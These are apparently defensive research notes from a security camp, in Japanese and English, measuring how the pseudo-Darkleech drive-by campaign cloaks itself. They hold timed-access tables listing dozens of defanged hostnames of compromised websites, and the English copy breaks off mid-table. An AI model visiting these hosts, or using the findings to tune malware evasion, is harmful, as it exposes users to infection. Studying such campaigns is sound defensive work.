├── 2017
├── pseudo-Darkleech_cloaking.md
├── pseudo-Darkleech_cloaking_en.md
├── seccamp_2017_tutor_presentation.pdf
├── seccamp_award_2017_en.pdf
└── seccamp_award_2017_ja.pdf
└── 2018
└── queryn.md
/2017/pseudo-Darkleech_cloaking.md:
--------------------------------------------------------------------------------
1 | # pseudo-Darkleech
2 | - Drive-by Dowload攻撃のキャンペーンの1つ
3 | - 非常に活発
4 | - 昨日は20以上のCompromisedサイトを観測
5 | - 詳細はmalware-traffic-analysisやUnit 42の記事がオススメ
6 | - http://www.malware-traffic-analysis.net/2017/03/20/index2.html
7 | - http://researchcenter.paloaltonetworks.com/2016/12/unit42-campaign-evolution-pseudo-darkleech-2016/
8 |
9 | ---
10 |
11 | ## PDLのアクセス制御
12 | - PDLは同一のIPで2度以上アクセスすると500を返す
13 | - アクセスログを持っている
14 | - 同一のIPで複数のCompromisedサイトにアクセスすると正常なページを返す
15 | - Cloaking
16 | - バックエンドでの実装はどうなっているのか
17 |
18 | ---
19 |
20 | ## Cloaking
21 | ### 実験
22 | 50ほどのCompromisedサイトにアクセスするプログラムを実装し, 一定間隔でアクセスを行った
23 | アクセス間隔は0秒, 5秒, 15秒, 30秒, 1分, 5分, 10分, 30分, 1時間
24 | 各実験ごとに異なるIPでアクセスし, 何度目でinjectコードが観測出来なくなるか調査した
25 |
26 | ---
27 |
28 | ### 実験結果
29 | 各実験の結果は以下のとおり
30 |
31 | #### 1回目
32 | ##### 0秒
33 | |no|access time|host|
34 | |:--|:--|:--|
35 | |1|2017-03-21 09:34:04|www[.]ffa[.]hr|
36 | |2|2017-03-21 09:34:06|alkuwarih[.]com|
37 | |3|2017-03-21 09:34:11|www[.]lingoclub[.]com|
38 | |4|2017-03-21 09:34:14|www[.]hejazee[.]ir|
39 | |5|2017-03-21 09:34:17|kachnul[.]org|
40 | |6|2017-03-21 09:34:20|www[.]kremlinpalace[.]org|
41 | |7|2017-03-21 09:34:24|www[.]asmecal[.]it|
42 | |8|2017-03-21 09:34:25|www[.]ext-joom[.]com|
43 | |9|2017-03-21 09:34:35|www[.]irafina[.]gr|
44 | |10|2017-03-21 09:34:38|yubiley[.]org|
45 | |11|2017-03-21 09:34:40|www[.]axioo[.]com|
46 | |12|2017-03-21 09:34:42|www[.]scheduleinterpreter[.]com|
47 | |13|2017-03-21 09:34:44|www[.]monopark[.]com[.]mx|
48 | |14|2017-03-21 09:34:46|lenovo-fun[.]com|
49 | |15|2017-03-21 09:34:49|loadcraft[.]net|
50 | |16|2017-03-21 09:34:53|lapsid[.]sk|
51 | |17|2017-03-21 09:35:02|www[.]utilisersonmac[.]com|
52 |
53 | ##### 5秒
54 | |no|access time|host|
55 | |:--|:--|:--|
56 | |1|2017-03-21 09:44:18|www[.]ffa[.]hr|
57 | |2|2017-03-21 09:44:25|alkuwarih[.]com|
58 | |3|2017-03-21 09:44:35|www[.]lingoclub[.]com|
59 | |4|2017-03-21 09:44:43|www[.]hejazee[.]ir|
60 | |5|2017-03-21 09:44:51|kachnul[.]org|
61 | |6|2017-03-21 09:44:59|www[.]kremlinpalace[.]org|
62 | |7|2017-03-21 09:45:08|www[.]asmecal[.]it|
63 | |8|2017-03-21 09:45:15|www[.]ext-joom[.]com|
64 | |9|2017-03-21 09:45:31|www[.]irafina[.]gr|
65 | |10|2017-03-21 09:45:38|yubiley[.]org|
66 | |11|2017-03-21 09:45:45|www[.]axioo[.]com|
67 | |12|2017-03-21 09:45:52|www[.]scheduleinterpreter[.]com|
68 | |13|2017-03-21 09:46:00|www[.]monopark[.]com[.]mx|
69 |
70 | ##### 15秒
71 | |no|access time|host|
72 | |:--|:--|:--|
73 | |1|2017-03-21 09:59:03|www[.]ffa[.]hr|
74 | |2|2017-03-21 09:59:25|alkuwarih[.]com|
75 | |3|2017-03-21 09:59:50|www[.]lingoclub[.]com|
76 | |4|2017-03-21 10:00:13|www[.]hejazee[.]ir|
77 | |5|2017-03-21 10:00:36|kachnul[.]org|
78 | |6|2017-03-21 10:00:58|www[.]kremlinpalace[.]org|
79 | |7|2017-03-21 10:01:23|www[.]asmecal[.]it|
80 | |8|2017-03-21 10:01:45|www[.]ext-joom[.]com|
81 | |9|2017-03-21 10:02:14|www[.]irafina[.]gr|
82 | |10|2017-03-21 10:02:37|yubiley[.]org|
83 | |11|2017-03-21 10:02:59|www[.]axioo[.]com|
84 |
85 | ##### 30秒
86 | |no|access time|host|
87 | |:--|:--|:--|
88 | |1|2017-03-21 10:18:31|www[.]ffa[.]hr|
89 | |2|2017-03-21 10:19:03|alkuwarih[.]com|
90 | |3|2017-03-21 10:19:37|www[.]lingoclub[.]com|
91 | |4|2017-03-21 10:20:10|www[.]hejazee[.]ir|
92 | |5|2017-03-21 10:20:43|kachnul[.]org|
93 | |6|2017-03-21 10:21:16|www[.]kremlinpalace[.]org|
94 | |7|2017-03-21 10:21:49|www[.]asmecal[.]it|
95 | |8|2017-03-21 10:22:21|www[.]ext-joom[.]com|
96 | |9|2017-03-21 10:22:56|shadshow[.]ir|
97 | |10|2017-03-21 10:23:29|www[.]irafina[.]gr|
98 | |11|2017-03-21 10:24:02|yubiley[.]org|
99 |
100 | ##### 1分
101 | |no|access time|host|
102 | |:--|:--|:--|
103 | |1|2017-03-21 10:35:57|www[.]ffa[.]hr|
104 | |2|2017-03-21 10:36:59|alkuwarih[.]com|
105 | |3|2017-03-21 10:38:03|www[.]lingoclub[.]com|
106 | |4|2017-03-21 10:39:06|www[.]hejazee[.]ir|
107 | |5|2017-03-21 10:40:09|kachnul[.]org|
108 | |6|2017-03-21 10:41:12|www[.]kremlinpalace[.]org|
109 | |7|2017-03-21 10:42:18|www[.]asmecal[.]it|
110 | |8|2017-03-21 10:43:20|www[.]ext-joom[.]com|
111 | |9|2017-03-21 10:44:33|yubiley[.]org|
112 |
113 | ##### 5分
114 | |no|access time|host|
115 | |:--|:--|:--|
116 | |1|2017-03-21 11:03:11|www[.]ffa[.]hr|
117 | |2|2017-03-21 11:08:13|alkuwarih[.]com|
118 | |3|2017-03-21 11:13:17|www[.]lingoclub[.]com|
119 | |4|2017-03-21 11:18:19|www[.]hejazee[.]ir|
120 | |5|2017-03-21 11:23:22|kachnul[.]org|
121 | |6|2017-03-21 11:28:24|www[.]kremlinpalace[.]org|
122 | |7|2017-03-21 11:33:28|www[.]asmecal[.]it|
123 | |8|2017-03-21 11:38:29|www[.]ext-joom[.]com|
124 | |9|2017-03-21 11:43:35|shadshow[.]ir|
125 |
126 | ##### 10分
127 | |no|access time|host|
128 | |:--|:--|:--|
129 | |1|2017-03-21 11:13:31|www[.]ffa[.]hr|
130 | |2|2017-03-21 11:23:33|alkuwarih[.]com|
131 | |3|2017-03-21 11:33:37|www[.]lingoclub[.]com|
132 | |4|2017-03-21 11:43:40|www[.]hejazee[.]ir|
133 | |5|2017-03-21 11:53:43|kachnul[.]org|
134 | |6|2017-03-21 12:03:46|www[.]kremlinpalace[.]org|
135 | |7|2017-03-21 12:13:50|www[.]asmecal[.]it|
136 | |8|2017-03-21 12:23:51|www[.]ext-joom[.]com|
137 | |9|2017-03-21 12:34:05|www[.]irafina[.]gr|
138 |
139 | ##### 30分
140 | |no|access time|host|
141 | |:--|:--|:--|
142 | |1|2017-03-21 09:00:28|www[.]ffa[.]hr|
143 | |2|2017-03-21 09:30:31|alkuwarih[.]com|
144 | |3|2017-03-21 10:00:35|www[.]lingoclub[.]com|
145 | |4|2017-03-21 10:30:37|www[.]hejazee[.]ir|
146 | |5|2017-03-21 11:00:40|kachnul[.]org|
147 | |6|2017-03-21 11:30:43|www[.]kremlinpalace[.]org|
148 | |7|2017-03-21 12:00:47|www[.]asmecal[.]it|
149 | |8|2017-03-21 12:30:48|www[.]ext-joom[.]com|
150 | |9|2017-03-21 13:00:59|www[.]irafina[.]gr|
151 |
152 | ##### 1時間
153 | |no|access time|host|
154 | |:--|:--|:--|
155 | |1|2017-03-21 16:19:42|www[.]ffa[.]hr|
156 | |2|2017-03-21 17:19:44|alkuwarih[.]com|
157 | |3|2017-03-21 18:19:49|www[.]lingoclub[.]com|
158 | |4|2017-03-21 19:19:51|www[.]hejazee[.]ir|
159 | |5|2017-03-21 20:19:55|kachnul[.]org|
160 | |6|2017-03-21 21:19:58|www[.]kremlinpalace[.]org|
161 | |7|2017-03-21 22:20:02|www[.]asmecal[.]it|
162 | |8|2017-03-21 23:20:03|www[.]ext-joom[.]com|
163 | |9|2017-03-22 00:20:14|www[.]irafina[.]gr|
164 |
165 | ---
166 |
167 | #### 2回目
168 | ##### 0秒
169 | |no|access time|host|
170 | |:--|:--|:--|
171 | |1|2017-03-22 01:56:14|loadcraft[.]net|
172 | |2|2017-03-22 01:56:23|my-teacher[.]fr|
173 | |3|2017-03-22 01:56:25|www[.]utilisersonmac[.]com|
174 | |4|2017-03-22 01:56:29|www[.]gwbicycles[.]com|
175 | |5|2017-03-22 01:56:33|www[.]poliglot-16[.]com|
176 | |6|2017-03-22 01:56:34|www[.]stanjamesaffiliates[.]com|
177 | |7|2017-03-22 01:56:37|www[.]mediaservis[.]hr|
178 | |8|2017-03-22 01:56:41|www[.]atfalclub[.]com|
179 | |9|2017-03-22 01:56:43|www[.]sohofactory[.]pl|
180 | |10|2017-03-22 01:56:47|www[.]simply-vegan[.]org|
181 | |11|2017-03-22 01:56:49|www[.]lamarieeauxpiedsnus[.]com|
182 | |12|2017-03-22 01:56:51|www[.]gscpsdsd[.]in|
183 | |13|2017-03-22 01:56:53|www[.]analiticaweb[.]es|
184 | |14|2017-03-22 01:56:55|www[.]samethattune[.]com|
185 | |15|2017-03-22 01:57:00|www[.]selfprinting[.]es|
186 |
187 | ##### 5秒
188 | |no|access time|host|
189 | |:--|:--|:--|
190 | |1|2017-03-22 06:29:43|loadcraft[.]net|
191 | |2|2017-03-22 06:29:52|lapsid[.]sk|
192 | |3|2017-03-22 06:30:05|www[.]utilisersonmac[.]com|
193 | |4|2017-03-22 06:30:13|kedaipena[.]com|
194 | |5|2017-03-22 06:30:21|www[.]gwbicycles[.]com|
195 | |6|2017-03-22 06:30:29|www[.]poliglot-16[.]com|
196 | |7|2017-03-22 06:30:36|www[.]stanjamesaffiliates[.]com|
197 | |8|2017-03-22 06:30:43|www[.]mediaservis[.]hr|
198 | |9|2017-03-22 06:30:52|www[.]atfalclub[.]com|
199 | |10|2017-03-22 06:30:59|www[.]sohofactory[.]pl|
200 | |11|2017-03-22 06:31:06|www[.]simply-vegan[.]org|
201 | |12|2017-03-22 06:31:13|www[.]lamarieeauxpiedsnus[.]com|
202 | |13|2017-03-22 06:31:20|www[.]gscpsdsd[.]in|
203 | |14|2017-03-22 06:31:27|www[.]analiticaweb[.]es|
204 | |15|2017-03-22 06:31:34|www[.]samethattune[.]com|
205 | |16|2017-03-22 06:31:43|www[.]selfprinting[.]es|
206 | |17|2017-03-22 06:31:57|www[.]chelagarto[.]com|
207 |
208 | ##### 15秒
209 | |no|access time|host|
210 | |:--|:--|:--|
211 | |1|2017-03-22 04:04:05|www[.]gscpsdsd[.]in|
212 | |2|2017-03-22 04:04:22|www[.]analiticaweb[.]es|
213 | |3|2017-03-22 04:04:40|www[.]samethattune[.]com|
214 | |4|2017-03-22 04:05:00|www[.]selfprinting[.]es|
215 | |5|2017-03-22 04:05:21|www[.]chelagarto[.]com|
216 | |6|2017-03-22 04:05:40|www[.]cosmosbank[.]com|
217 | |7|2017-03-22 04:05:58|www[.]eurodiastasi[.]gr|
218 | |8|2017-03-22 04:06:17|www[.]traccs[.]net|
219 | |9|2017-03-22 04:06:34|biokurier[.]pl|
220 | |10|2017-03-22 04:06:56|oyeintelligence[.]com|
221 | |11|2017-03-22 04:07:19|dietwink[.]com|
222 | |12|2017-03-22 04:07:42|www[.]wallhd4[.]com|
223 | |13|2017-03-22 04:07:58|www[.]lovlose[.]com|
224 | |14|2017-03-22 04:08:16|customwritingtips[.]com|
225 | |15|2017-03-22 04:08:39|medicalhome[.]ir|
226 | |16|2017-03-22 04:09:00|www[.]fortlauderdaledaily[.]com|
227 |
228 | ##### 30秒
229 | |no|access time|host|
230 | |:--|:--|:--|
231 | |1|2017-03-22 06:44:55|loadcraft[.]net|
232 | |2|2017-03-22 06:45:29|lapsid[.]sk|
233 | |3|2017-03-22 06:46:02|my-teacher[.]fr|
234 | |4|2017-03-22 06:46:34|www[.]utilisersonmac[.]com|
235 | |5|2017-03-22 06:47:07|kedaipena[.]com|
236 | |6|2017-03-22 06:47:42|www[.]gwbicycles[.]com|
237 | |7|2017-03-22 06:48:15|www[.]poliglot-16[.]com|
238 | |8|2017-03-22 06:48:47|www[.]stanjamesaffiliates[.]com|
239 | |9|2017-03-22 06:49:19|www[.]mediaservis[.]hr|
240 | |10|2017-03-22 06:49:54|www[.]atfalclub[.]com|
241 | |11|2017-03-22 06:50:28|www[.]sohofactory[.]pl|
242 | |12|2017-03-22 06:51:02|www[.]simply-vegan[.]org|
243 | |13|2017-03-22 06:51:34|www[.]lamarieeauxpiedsnus[.]com|
244 | |14|2017-03-22 06:52:06|www[.]gscpsdsd[.]in|
245 | |15|2017-03-22 06:52:38|www[.]analiticaweb[.]es|
246 |
247 | ##### 1分
248 | |no|access time|host|
249 | |:--|:--|:--|
250 | |1|2017-03-22 03:33:28|www[.]mediaservis[.]hr|
251 | |2|2017-03-22 03:34:33|www[.]atfalclub[.]com|
252 | |3|2017-03-22 03:35:35|www[.]sohofactory[.]pl|
253 | |4|2017-03-22 03:36:37|www[.]simply-vegan[.]org|
254 | |5|2017-03-22 03:37:38|www[.]lamarieeauxpiedsnus[.]com|
255 | |6|2017-03-22 03:38:42|www[.]gscpsdsd[.]in|
256 | |7|2017-03-22 03:39:43|www[.]analiticaweb[.]es|
257 | |8|2017-03-22 03:40:45|www[.]samethattune[.]com|
258 | |9|2017-03-22 03:41:49|www[.]selfprinting[.]es|
259 | |10|2017-03-22 03:43:00|www[.]cosmosbank[.]com|
260 | |11|2017-03-22 03:44:03|www[.]eurodiastasi[.]gr|
261 | |12|2017-03-22 03:45:08|www[.]traccs[.]net|
262 |
263 | ##### 5分
264 | |no|access time|host|
265 | |:--|:--|:--|
266 | |1|2017-03-22 02:18:51|loadcraft[.]net|
267 | |2|2017-03-22 02:23:57|lapsid[.]sk|
268 | |3|2017-03-22 02:29:06|www[.]utilisersonmac[.]com|
269 | |4|2017-03-22 02:34:08|kedaipena[.]com|
270 | |5|2017-03-22 02:39:10|www[.]gwbicycles[.]com|
271 | |6|2017-03-22 02:44:14|www[.]poliglot-16[.]com|
272 | |7|2017-03-22 02:49:16|www[.]stanjamesaffiliates[.]com|
273 | |8|2017-03-22 02:54:29|www[.]sohofactory[.]pl|
274 | |9|2017-03-22 02:59:31|www[.]simply-vegan[.]org|
275 | |10|2017-03-22 03:04:32|www[.]lamarieeauxpiedsnus[.]com|
276 | |11|2017-03-22 03:09:36|www[.]gscpsdsd[.]in|
277 | |12|2017-03-22 03:14:37|www[.]analiticaweb[.]es|
278 | |13|2017-03-22 03:19:40|www[.]samethattune[.]com|
279 |
280 | ##### 10分
281 | |no|access time|host|
282 | |:--|:--|:--|
283 | |1|2017-03-22 06:19:17|www[.]gwbicycles[.]com|
284 | |2|2017-03-22 06:29:20|www[.]poliglot-16[.]com|
285 | |3|2017-03-22 06:39:22|www[.]stanjamesaffiliates[.]com|
286 | |4|2017-03-22 06:49:30|www[.]atfalclub[.]com|
287 | |5|2017-03-22 06:59:32|www[.]sohofactory[.]pl|
288 | |6|2017-03-22 07:09:34|www[.]simply-vegan[.]org|
289 | |7|2017-03-22 07:19:35|www[.]lamarieeauxpiedsnus[.]com|
290 | |8|2017-03-22 07:29:39|www[.]gscpsdsd[.]in|
291 | |9|2017-03-22 07:39:41|www[.]analiticaweb[.]es|
292 | |10|2017-03-22 07:49:43|www[.]samethattune[.]com|
293 | |11|2017-03-22 07:59:47|www[.]selfprinting[.]es|
294 | |12|2017-03-22 08:09:53|www[.]chelagarto[.]com|
295 | |13|2017-03-22 08:19:56|www[.]cosmosbank[.]com|
296 | |14|2017-03-22 08:29:59|www[.]eurodiastasi[.]gr|
297 |
298 | ---
299 |
300 | ### 考察
301 | アクセスしたユーザの情報が統括サーバにあるのか各サーバに存在するのか分からないが一定の規則がある
302 | - ユーザ情報は1分おきに各サーバから送信され, 同期される
303 | - 送信処理や同期処理が一瞬で行われるわけではない
304 | - 微妙にタイムラグがあるが, 0秒前後で送信・同期が行われる
305 | - 10回前後, 同一のIPでCompromisedサイトにアクセスした場合はブラックリストに入る
306 | - アクセスするCompromisedサイトによって誤差がある
307 | - ユーザ情報が送信・同期される処理の有無(成功/失敗)・タイミングなどが異なるのでは?
308 | - ブラックリストに入った場合, アクセスしたことがないCompromisedサイトにアクセスしても正常なページを返す
309 |
310 | ## まとめ
311 | - PDLはそれぞれのCompromisedサイト同士でユーザ情報を共有している
312 | - 10回前後, 同一のIPでアクセスするとブラックリストに入る
313 |
--------------------------------------------------------------------------------
/2017/pseudo-Darkleech_cloaking_en.md:
--------------------------------------------------------------------------------
1 | # pseudo-Darkleech
2 | - Drive-by Download One of the attack campaigns
3 | - Extremely active
4 | - Yesterday I observed over 20 Compromised sites
5 | - For details, please refer to malware-traffic-analysis and articles of Unit 42
6 | - http://www.malware-traffic-analysis.net/2017/03/20/index2.html
7 | - http://researchcenter.paloaltonetworks.com/2016/12/unit42-campaign-evolution-pseudo-darkleech-2016/
8 |
9 | ---
10 |
11 | ## PDL's access control
12 | - PDL returns 500 if it accessed more than once with the same IP
13 | - PDL have an access log
14 | - Returning a normal page when accessing multiple Compromised sites with the same IP
15 | - Cloaking
16 | - What is the implementation at the back end
17 |
18 | ---
19 |
20 | ## Cloaking
21 | ### Experiment
22 | I installed a program to access about 50 Compromised sites and accessed at regular intervals
23 | The access interval is 0 second, 5 seconds, 15 seconds, 30 seconds, 1 minute, 5 minutes, 10 minutes, 30 minutes, 1 hour
24 | Each experiment was accessed with different IP and investigation was made to see how many times the inject code could not be observed
25 |
26 | ---
27 |
28 | ### Experimental result
29 | The results of each experiment are as follows
30 |
31 | #### First time
32 | ##### 0 seconds
33 | |no|access time|host|
34 | |:--|:--|:--|
35 | |1|2017-03-21 09:34:04|www[.]ffa[.]hr|
36 | |2|2017-03-21 09:34:06|alkuwarih[.]com|
37 | |3|2017-03-21 09:34:11|www[.]lingoclub[.]com|
38 | |4|2017-03-21 09:34:14|www[.]hejazee[.]ir|
39 | |5|2017-03-21 09:34:17|kachnul[.]org|
40 | |6|2017-03-21 09:34:20|www[.]kremlinpalace[.]org|
41 | |7|2017-03-21 09:34:24|www[.]asmecal[.]it|
42 | |8|2017-03-21 09:34:25|www[.]ext-joom[.]com|
43 | |9|2017-03-21 09:34:35|www[.]irafina[.]gr|
44 | |10|2017-03-21 09:34:38|yubiley[.]org|
45 | |11|2017-03-21 09:34:40|www[.]axioo[.]com|
46 | |12|2017-03-21 09:34:42|www[.]scheduleinterpreter[.]com|
47 | |13|2017-03-21 09:34:44|www[.]monopark[.]com[.]mx|
48 | |14|2017-03-21 09:34:46|lenovo-fun[.]com|
49 | |15|2017-03-21 09:34:49|loadcraft[.]net|
50 | |16|2017-03-21 09:34:53|lapsid[.]sk|
51 | |17|2017-03-21 09:35:02|www[.]utilisersonmac[.]com|
52 |
53 | ##### 5 seconds
54 | |no|access time|host|
55 | |:--|:--|:--|
56 | |1|2017-03-21 09:44:18|www[.]ffa[.]hr|
57 | |2|2017-03-21 09:44:25|alkuwarih[.]com|
58 | |3|2017-03-21 09:44:35|www[.]lingoclub[.]com|
59 | |4|2017-03-21 09:44:43|www[.]hejazee[.]ir|
60 | |5|2017-03-21 09:44:51|kachnul[.]org|
61 | |6|2017-03-21 09:44:59|www[.]kremlinpalace[.]org|
62 | |7|2017-03-21 09:45:08|www[.]asmecal[.]it|
63 | |8|2017-03-21 09:45:15|www[.]ext-joom[.]com|
64 | |9|2017-03-21 09:45:31|www[.]irafina[.]gr|
65 | |10|2017-03-21 09:45:38|yubiley[.]org|
66 | |11|2017-03-21 09:45:45|www[.]axioo[.]com|
67 | |12|2017-03-21 09:45:52|www[.]scheduleinterpreter[.]com|
68 | |13|2017-03-21 09:46:00|www[.]monopark[.]com[.]mx|
69 |
70 | ##### 15 seconds
71 | |no|access time|host|
72 | |:--|:--|:--|
73 | |1|2017-03-21 09:59:03|www[.]ffa[.]hr|
74 | |2|2017-03-21 09:59:25|alkuwarih[.]com|
75 | |3|2017-03-21 09:59:50|www[.]lingoclub[.]com|
76 | |4|2017-03-21 10:00:13|www[.]hejazee[.]ir|
77 | |5|2017-03-21 10:00:36|kachnul[.]org|
78 | |6|2017-03-21 10:00:58|www[.]kremlinpalace[.]org|
79 | |7|2017-03-21 10:01:23|www[.]asmecal[.]it|
80 | |8|2017-03-21 10:01:45|www[.]ext-joom[.]com|
81 | |9|2017-03-21 10:02:14|www[.]irafina[.]gr|
82 | |10|2017-03-21 10:02:37|yubiley[.]org|
83 | |11|2017-03-21 10:02:59|www[.]axioo[.]com|
84 |
85 | ##### 30 seconds
86 | |no|access time|host|
87 | |:--|:--|:--|
88 | |1|2017-03-21 10:18:31|www[.]ffa[.]hr|
89 | |2|2017-03-21 10:19:03|alkuwarih[.]com|
90 | |3|2017-03-21 10:19:37|www[.]lingoclub[.]com|
91 | |4|2017-03-21 10:20:10|www[.]hejazee[.]ir|
92 | |5|2017-03-21 10:20:43|kachnul[.]org|
93 | |6|2017-03-21 10:21:16|www[.]kremlinpalace[.]org|
94 | |7|2017-03-21 10:21:49|www[.]asmecal[.]it|
95 | |8|2017-03-21 10:22:21|www[.]ext-joom[.]com|
96 | |9|2017-03-21 10:22:56|shadshow[.]ir|
97 | |10|2017-03-21 10:23:29|www[.]irafina[.]gr|
98 | |11|2017-03-21 10:24:02|yubiley[.]org|
99 |
100 | ##### 1 minute
101 | |no|access time|host|
102 | |:--|:--|:--|
103 | |1|2017-03-21 10:35:57|www[.]ffa[.]hr|
104 | |2|2017-03-21 10:36:59|alkuwarih[.]com|
105 | |3|2017-03-21 10:38:03|www[.]lingoclub[.]com|
106 | |4|2017-03-21 10:39:06|www[.]hejazee[.]ir|
107 | |5|2017-03-21 10:40:09|kachnul[.]org|
108 | |6|2017-03-21 10:41:12|www[.]kremlinpalace[.]org|
109 | |7|2017-03-21 10:42:18|www[.]asmecal[.]it|
110 | |8|2017-03-21 10:43:20|www[.]ext-joom[.]com|
111 | |9|2017-03-21 10:44:33|yubiley[.]org|
112 |
113 | ##### 5 minutes
114 | |no|access time|host|
115 | |:--|:--|:--|
116 | |1|2017-03-21 11:03:11|www[.]ffa[.]hr|
117 | |2|2017-03-21 11:08:13|alkuwarih[.]com|
118 | |3|2017-03-21 11:13:17|www[.]lingoclub[.]com|
119 | |4|2017-03-21 11:18:19|www[.]hejazee[.]ir|
120 | |5|2017-03-21 11:23:22|kachnul[.]org|
121 | |6|2017-03-21 11:28:24|www[.]kremlinpalace[.]org|
122 | |7|2017-03-21 11:33:28|www[.]asmecal[.]it|
123 | |8|2017-03-21 11:38:29|www[.]ext-joom[.]com|
124 | |9|2017-03-21 11:43:35|shadshow[.]ir|
125 |
126 | ##### 10 minutes
127 | |no|access time|host|
128 | |:--|:--|:--|
129 | |1|2017-03-21 11:13:31|www[.]ffa[.]hr|
130 | |2|2017-03-21 11:23:33|alkuwarih[.]com|
131 | |3|2017-03-21 11:33:37|www[.]lingoclub[.]com|
132 | |4|2017-03-21 11:43:40|www[.]hejazee[.]ir|
133 | |5|2017-03-21 11:53:43|kachnul[.]org|
134 | |6|2017-03-21 12:03:46|www[.]kremlinpalace[.]org|
135 | |7|2017-03-21 12:13:50|www[.]asmecal[.]it|
136 | |8|2017-03-21 12:23:51|www[.]ext-joom[.]com|
137 | |9|2017-03-21 12:34:05|www[.]irafina[.]gr|
138 |
139 | ##### 30 minutes
140 | |no|access time|host|
141 | |:--|:--|:--|
142 | |1|2017-03-21 09:00:28|www[.]ffa[.]hr|
143 | |2|2017-03-21 09:30:31|alkuwarih[.]com|
144 | |3|2017-03-21 10:00:35|www[.]lingoclub[.]com|
145 | |4|2017-03-21 10:30:37|www[.]hejazee[.]ir|
146 | |5|2017-03-21 11:00:40|kachnul[.]org|
147 | |6|2017-03-21 11:30:43|www[.]kremlinpalace[.]org|
148 | |7|2017-03-21 12:00:47|www[.]asmecal[.]it|
149 | |8|2017-03-21 12:30:48|www[.]ext-joom[.]com|
150 | |9|2017-03-21 13:00:59|www[.]irafina[.]gr|
151 |
152 | ##### 1 hour
153 | |no|access time|host|
154 | |:--|:--|:--|
155 | |1|2017-03-21 16:19:42|www[.]ffa[.]hr|
156 | |2|2017-03-21 17:19:44|alkuwarih[.]com|
157 | |3|2017-03-21 18:19:49|www[.]lingoclub[.]com|
158 | |4|2017-03-21 19:19:51|www[.]hejazee[.]ir|
159 | |5|2017-03-21 20:19:55|kachnul[.]org|
160 | |6|2017-03-21 21:19:58|www[.]kremlinpalace[.]org|
161 | |7|2017-03-21 22:20:02|www[.]asmecal[.]it|
162 | |8|2017-03-21 23:20:03|www[.]ext-joom[.]com|
163 | |9|2017-03-22 00:20:14|www[.]irafina[.]gr|
164 |
165 | ---
166 |
167 | #### Second time
168 | ##### 0 seconds
169 | |no|access time|host|
170 | |:--|:--|:--|
171 | |1|2017-03-22 01:56:14|loadcraft[.]net|
172 | |2|2017-03-22 01:56:23|my-teacher[.]fr|
173 | |3|2017-03-22 01:56:25|www[.]utilisersonmac[.]com|
174 | |4|2017-03-22 01:56:29|www[.]gwbicycles[.]com|
175 | |5|2017-03-22 01:56:33|www[.]poliglot-16[.]com|
176 | |6|2017-03-22 01:56:34|www[.]stanjamesaffiliates[.]com|
177 | |7|2017-03-22 01:56:37|www[.]mediaservis[.]hr|
178 | |8|2017-03-22 01:56:41|www[.]atfalclub[.]com|
179 | |9|2017-03-22 01:56:43|www[.]sohofactory[.]pl|
180 | |10|2017-03-22 01:56:47|www[.]simply-vegan[.]org|
181 | |11|2017-03-22 01:56:49|www[.]lamarieeauxpiedsnus[.]com|
182 | |12|2017-03-22 01:56:51|www[.]gscpsdsd[.]in|
183 | |13|2017-03-22 01:56:53|www[.]analiticaweb[.]es|
184 | |14|2017-03-22 01:56:55|www[.]samethattune[.]com|
185 | |15|2017-03-22 01:57:00|www[.]selfprinting[.]es|
186 |
187 | ##### 5 seconds
188 | |no|access time|host|
189 | |:--|:--|:--|
190 | |1|2017-03-22 06:29:43|loadcraft[.]net|
191 | |2|2017-03-22 06:29:52|lapsid[.]sk|
192 | |3|2017-03-22 06:30:05|www[.]utilisersonmac[.]com|
193 | |4|2017-03-22 06:30:13|kedaipena[.]com|
194 | |5|2017-03-22 06:30:21|www[.]gwbicycles[.]com|
195 | |6|2017-03-22 06:30:29|www[.]poliglot-16[.]com|
196 | |7|2017-03-22 06:30:36|www[.]stanjamesaffiliates[.]com|
197 | |8|2017-03-22 06:30:43|www[.]mediaservis[.]hr|
198 | |9|2017-03-22 06:30:52|www[.]atfalclub[.]com|
199 | |10|2017-03-22 06:30:59|www[.]sohofactory[.]pl|
200 | |11|2017-03-22 06:31:06|www[.]simply-vegan[.]org|
201 | |12|2017-03-22 06:31:13|www[.]lamarieeauxpiedsnus[.]com|
202 | |13|2017-03-22 06:31:20|www[.]gscpsdsd[.]in|
203 | |14|2017-03-22 06:31:27|www[.]analiticaweb[.]es|
204 | |15|2017-03-22 06:31:34|www[.]samethattune[.]com|
205 | |16|2017-03-22 06:31:43|www[.]selfprinting[.]es|
206 | |17|2017-03-22 06:31:57|www[.]chelagarto[.]com|
207 |
208 | ##### 15 seconds
209 | |no|access time|host|
210 | |:--|:--|:--|
211 | |1|2017-03-22 04:04:05|www[.]gscpsdsd[.]in|
212 | |2|2017-03-22 04:04:22|www[.]analiticaweb[.]es|
213 | |3|2017-03-22 04:04:40|www[.]samethattune[.]com|
214 | |4|2017-03-22 04:05:00|www[.]selfprinting[.]es|
215 | |5|2017-03-22 04:05:21|www[.]chelagarto[.]com|
216 | |6|2017-03-22 04:05:40|www[.]cosmosbank[.]com|
217 | |7|2017-03-22 04:05:58|www[.]eurodiastasi[.]gr|
218 | |8|2017-03-22 04:06:17|www[.]traccs[.]net|
219 | |9|2017-03-22 04:06:34|biokurier[.]pl|
220 | |10|2017-03-22 04:06:56|oyeintelligence[.]com|
221 | |11|2017-03-22 04:07:19|dietwink[.]com|
222 | |12|2017-03-22 04:07:42|www[.]wallhd4[.]com|
223 | |13|2017-03-22 04:07:58|www[.]lovlose[.]com|
224 | |14|2017-03-22 04:08:16|customwritingtips[.]com|
225 | |15|2017-03-22 04:08:39|medicalhome[.]ir|
226 | |16|2017-03-22 04:09:00|www[.]fortlauderdaledaily[.]com|
227 |
228 | ##### 30 seconds
229 | |no|access time|host|
230 | |:--|:--|:--|
231 | |1|2017-03-22 06:44:55|loadcraft[.]net|
232 | |2|2017-03-22 06:45:29|lapsid[.]sk|
233 | |3|2017-03-22 06:46:02|my-teacher[.]fr|
234 | |4|2017-03-22 06:46:34|www[.]utilisersonmac[.]com|
235 | |5|2017-03-22 06:47:07|kedaipena[.]com|
236 | |6|2017-03-22 06:47:42|www[.]gwbicycles[.]com|
237 | |7|2017-03-22 06:48:15|www[.]poliglot-16[.]com|
238 | |8|2017-03-22 06:48:47|www[.]stanjamesaffiliates[.]com|
239 | |9|2017-03-22 06:49:19|www[.]mediaservis[.]hr|
240 | |10|2017-03-22 06:49:54|www[.]atfalclub[.]com|
241 | |11|2017-03-22 06:50:28|www[.]sohofactory[.]pl|
242 | |12|2017-03-22 06:51:02|www[.]simply-vegan[.]org|
243 | |13|2017-03-22 06:51:34|www[.]lamarieeauxpiedsnus[.]com|
